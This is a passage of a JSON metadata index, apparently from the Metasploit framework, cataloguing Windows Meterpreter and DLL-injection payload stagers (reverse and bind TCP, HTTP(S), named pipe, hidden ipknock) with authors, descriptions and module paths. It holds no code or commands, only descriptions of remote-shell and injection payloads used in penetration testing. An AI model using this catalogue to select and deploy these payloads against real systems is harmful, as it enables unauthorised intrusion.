"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_named_pipe": {
"name": "Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager",
"full_name": "payload/windows/meterpreter/reverse_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker via a named pipe pivot",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-01 03:49:00 +0000",
"path": "/modules/payloads/stagers/windows/reverse_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_nonx_tcp": {
"name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)",
"full_name": "payload/windows/meterpreter/reverse_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"vlad902 <vlad902@gmail.com>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker (No NX)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_ord_tcp": {
"name": "Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)",
"full_name": "payload/windows/meterpreter/reverse_ord_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"spoonm <spoonm@no$email.com>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_ord_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_tcp": {
"name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager",
"full_name": "payload/windows/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_tcp_allports": {
"name": "Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager",
"full_name": "payload/windows/meterpreter/reverse_tcp_allports",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_tcp_allports",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_tcp_dns": {
"name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)",
"full_name": "payload/windows/meterpreter/reverse_tcp_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>",
"RageLtMan"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_tcp_dns",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_tcp_rc4": {
"name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/meterpreter/reverse_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>",
"mihi",
"RageLtMan"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/meterpreter/reverse_tcp_rc4_dns": {
"name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)",
"full_name": "payload/windows/meterpreter/reverse_tcp_rc4_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>",
"mihi",
"RageLtMan"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_tcp_rc4_dns",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/meterpreter/reverse_tcp_uuid": {
"name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support",
"full_name": "payload/windows/meterpreter/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker with UUID Support",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_udp": {
"name": "Windows Meterpreter (Reflective Injection), Reverse UDP Stager with UUID Support",
"full_name": "payload/windows/meterpreter/reverse_udp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"RageLtMan <rageltman@sempervictus>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker with UUID Support",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-13 14:34:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_udp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_udp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_winhttp": {
"name": "Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp)",
"full_name": "payload/windows/meterpreter/reverse_winhttp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over HTTP (Windows winhttp)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/stagers/windows/reverse_winhttp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_winhttp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_winhttps": {
"name": "Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp)",
"full_name": "payload/windows/meterpreter/reverse_winhttps",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over HTTPS (Windows winhttp)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/stagers/windows/reverse_winhttps.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_winhttps",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter_bind_named_pipe": {
"name": "Windows Meterpreter Shell, Bind Named Pipe Inline",
"full_name": "payload/windows/meterpreter_bind_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"UserExistsError",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Connect to victim and spawn a Meterpreter shell",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-11 18:56:50 +0000",
"path": "/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter_bind_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter_bind_tcp": {
"name": "Windows Meterpreter Shell, Bind TCP Inline",
"full_name": "payload/windows/meterpreter_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"OJ Reeves",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect to victim and spawn a Meterpreter shell",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/singles/windows/meterpreter_bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter_reverse_http": {
"name": "Windows Meterpreter Shell, Reverse HTTP Inline",
"full_name": "payload/windows/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"OJ Reeves",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect back to attacker and spawn a Meterpreter shell",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/singles/windows/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter_reverse_https": {
"name": "Windows Meterpreter Shell, Reverse HTTPS Inline",
"full_name": "payload/windows/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"OJ Reeves",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect back to attacker and spawn a Meterpreter shell",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/singles/windows/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter_reverse_ipv6_tcp": {
"name": "Windows Meterpreter Shell, Reverse TCP Inline (IPv6)",
"full_name": "payload/windows/meterpreter_reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"OJ Reeves",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect back to attacker and spawn a Meterpreter shell",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter_reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter_reverse_tcp": {
"name": "Windows Meterpreter Shell, Reverse TCP Inline",
"full_name": "payload/windows/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"OJ Reeves",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect back to attacker and spawn a Meterpreter shell",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/metsvc_bind_tcp": {
"name": "Windows Meterpreter Service, Bind TCP",
"full_name": "payload/windows/metsvc_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Stub payload for interacting with a Meterpreter Service",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/metsvc_bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/metsvc_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/metsvc_reverse_tcp": {
"name": "Windows Meterpreter Service, Reverse TCP Inline",
"full_name": "payload/windows/metsvc_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Stub payload for interacting with a Meterpreter Service",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/metsvc_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/metsvc_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/bind_hidden_ipknock_tcp": {
"name": "Windows Inject DLL, Hidden Bind Ipknock TCP Stager",
"full_name": "payload/windows/patchupdllinject/bind_hidden_ipknock_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject a custom DLL into the exploited process. Listen for a connection. First, the port will need to be knocked from\n the IP defined in KHOST. This IP will work as an authentication method\n (you can spoof it with tools like hping). After that you could get your\n shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n hide the shellcode",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/bind_hidden_ipknock_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/bind_hidden_tcp": {
"name": "Windows Inject DLL, Hidden Bind TCP Stager",
"full_name": "payload/windows/patchupdllinject/bind_hidden_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject a custom DLL into the exploited process. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/bind_hidden_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/bind_ipv6_tcp": {
"name": "Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)",
"full_name": "payload/windows/patchupdllinject/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject a custom DLL into the exploited process. Listen for an IPv6 connection (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/bind_ipv6_tcp_uuid": {
"name": "Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/patchupdllinject/bind_ipv6_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject a custom DLL into the exploited process. Listen for an IPv6 connection with UUID Support (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/bind_ipv6_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/bind_named_pipe": {
"name": "Windows Inject DLL, Windows x86 Bind Named Pipe Stager",
"full_name": "payload/windows/patchupdllinject/bind_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"UserExistsError"
],
"description": "Inject a custom DLL into the exploited process. Listen for a pipe connection (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-27 19:24:51 +0000",
"path": "/modules/payloads/stagers/windows/bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/bind_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/bind_nonx_tcp": {
"name": "Windows Inject DLL, Bind TCP Stager (No NX or Win7)",
"full_name": "payload/windows/patchupdllinject/bind_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"vlad902 <vlad902@gmail.com>"
],
"description": "Inject a custom DLL into the exploited process. Listen for a connection (No NX)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/bind_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/bind_tcp": {
"name": "Windows Inject DLL, Bind TCP Stager (Windows x86)",
"full_name": "payload/windows/patchupdllinject/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject a custom DLL into the exploited process. Listen for a connection (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/bind_tcp_rc4": {
"name": "Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/patchupdllinject/bind_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"mihi",
"RageLtMan"
],
"description": "Inject a custom DLL into the exploited process. Listen for a connection",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/bind_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/patchupdllinject/bind_tcp_uuid": {
"name": "Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/patchupdllinject/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"OJ Reeves"
],
"description": "Inject a custom DLL into the exploited process. Listen for a connection with UUID Support (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/find_tag": {
"name": "Windows Inject DLL, Find Tag Ordinal Stager",
"full_name": "payload/windows/patchupdllinject/find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>"
],
"description": "Inject a custom DLL into the exploited process. Use an established connection",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/findtag_ord.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/reverse_ipv6_tcp": {
"name": "Windows Inject DLL, Reverse TCP Stager (IPv6)",
"full_name": "payload/windows/patchupdllinject/reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject a custom DLL into the exploited process. Connect back to the attacker over IPv6",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/reverse_nonx_tcp": {
"name": "Windows Inject DLL, Reverse TCP Stager (No NX or Win7)",
"full_name": "payload/windows/patchupdllinject/reverse_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"vlad902 <vlad902@gmail.com>"
],
"description": "Inject a custom DLL into the exploited process. Connect back to the attacker (No NX)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/reverse_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/reverse_ord_tcp": {
"name": "Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)",
"full_name": "payload/windows/patchupdllinject/reverse_ord_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"spoonm <spoonm@no$email.com>"
],
"description": "Inject a custom DLL into the exploited process. Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
